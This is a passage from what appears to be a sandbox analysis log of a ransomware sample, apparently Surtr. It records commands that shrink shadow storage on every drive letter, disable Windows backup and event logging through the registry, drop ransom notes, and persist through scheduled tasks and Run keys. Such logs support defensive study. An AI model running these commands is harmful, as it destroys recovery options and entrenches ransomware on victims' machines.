                                                                                                                                                          vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
                                                                                                                                                          3⤵
                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                          PID:3924
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
                                                                                                                                                        2⤵
                                                                                                                                                          PID:5404
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
                                                                                                                                                            3⤵
                                                                                                                                                              PID:6984
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
                                                                                                                                                            2⤵
                                                                                                                                                              PID:5392
                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
                                                                                                                                                                3⤵
                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                PID:6968
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5596
                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                  vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                  PID:7000
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5652
                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                    vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                    PID:6992
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5608
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:6976
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5860
                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                          vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                          PID:7120
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:5816
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:7080
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:5916
                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                PID:1512
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:6136
                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                  vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                  PID:524
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:6104
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2100
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:6032
                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                        vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                        PID:7052
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:6000
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:7144
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:5936
                                                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                              vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                                              PID:7128
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:5928
                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:7136
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:5908
                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:7112
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4748
                                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                        vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                        PID:3468
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:2836
                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                          vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                          PID:1204
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4824
                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                            vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                            PID:4880
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:6280
                                                                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                              vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                                                              PID:6572
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:6252
                                                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                PID:6904
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:6236
                                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                  vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                                  PID:1508
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:6168
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:6156
                                                                                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                      vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                                      PID:628
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:6484
                                                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                        vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                                        PID:3420
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:6748
                                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                          vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                                          PID:1056
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:6796
                                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                            vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                                            PID:4348
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:5552
                                                                                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                              vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                                                                              PID:4340
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:2324
                                                                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                                PID:6308
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:3828
                                                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                  vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                                                  PID:4720
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:4044
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:6940
                                                                                                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                      vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                                                      PID:1140
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:6932
                                                                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                        vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                                                        PID:4708
                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:6924
                                                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                          vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                                                          PID:4476
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:3248
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PublicData_7i3ng65rjpb8y4.surt" "%TEMP%\Service\PublicData_7i3ng65rjpb8y4.surt"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:2860
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PrivateData_7i3ng65rjpb8y4.surt" "%TEMP%\Service\PrivateData_7i3ng65rjpb8y4.surt"
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:6988
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:6384
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:7152
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:2588
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:6296
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        attrib +R /S "C:\ProgramData\Service"
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:6836
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:7008
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                          attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                          PID:6984
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:3524
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                            schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                            PID:6576
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:6604
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                              schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                              PID:6300
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Drops startup file
                                                                                                                                                                                                                                                            PID:2264
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:6648
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                PID:6560
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:6192
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                  PID:4756
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:4572
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                    PID:4304
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:4104
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                                                      PID:32
                                                                                                                                                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:2200
                                                                                                                                                                                                                                                                • C:\Windows\system32\wbengine.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:3764
                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:60
                                                                                                                                                                                                                                                                • C:\Windows\System32\vdsldr.exe
                                                                                                                                                                                                                                                                  C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:5564
                                                                                                                                                                                                                                                                  • C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                    C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                    PID:6780
                                                                                                                                                                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:2100

                                                                                                                                                                                                                                                                    Network

